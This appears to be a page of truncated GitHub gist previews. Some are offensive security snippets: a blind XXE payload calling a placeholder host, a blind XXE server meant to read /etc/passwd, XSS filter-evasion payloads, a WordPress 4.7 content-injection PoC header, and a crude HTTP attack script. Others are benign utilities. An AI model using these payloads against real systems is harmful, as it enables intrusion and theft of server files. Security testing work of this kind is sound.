This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# | |
# Simple Blind XXE server intended to handle incoming requests for | |
# malicious DTD file, that will subsequently ask for locally stored file, | |
# like file:///etc/passwd. | |
# | |
# This program has been tested with PlayFramework 2.1.3 XXE vulnerability, | |
# to be run as follows: | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from hashlib import md5 | |
from base64 import b64decode | |
from base64 import b64encode | |
from Crypto import Random | |
from Crypto.Cipher import AES | |
# Padding for the input string --not | |
# related to encryption itself. | |
BLOCK_SIZE = 16 # Bytes |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python -S | |
# -*- coding: utf-8 -*- | |
import sys | |
import re | |
import xml.sax | |
import io # for 2.6 | |
import StringIO # for 3.0 | |
# | |
# ** If your python is 2.x and xml-cording is utf-8 set follows. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# 2017 - @leonjza | |
# | |
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC | |
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html | |
# Usage example: | |
# | |
# List available posts: | |
# | |
# $ python inject.py http://localhost:8070/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
def split_into_groups(iterable, group_size): | |
"""Split an iterable collection into groups with fixed size. | |
Yield | |
----- | |
list[any] | |
Groups of elements. | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /usr/bin/perl | |
# | |
# based on https://stackoverflow.com/a/87531/5742651 | |
# usage: sqlite3 .dump database_name.sqlite3 | perl sqlite2mysql.pl | mysql -u root -p $import_database_name | |
# | |
# ignore follow lines: | |
# BEGIN TRANSACTION | |
# COMMIT | |
# sqlite_sequence | |
# CREATE UNIQUE INDEX |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket, sys, os | |
print "][ Attacking " + sys.argv[1] + " ... ][" | |
print "injecting " + sys.argv[2]; | |
def attack(): | |
#pid = os.fork() | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((sys.argv[1], 80)) | |
print ">> GET /" + sys.argv[2] + " HTTP/1.1" | |
s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n") | |
s.send("Host: " + sys.argv[1] + "\r\n\r\n"); |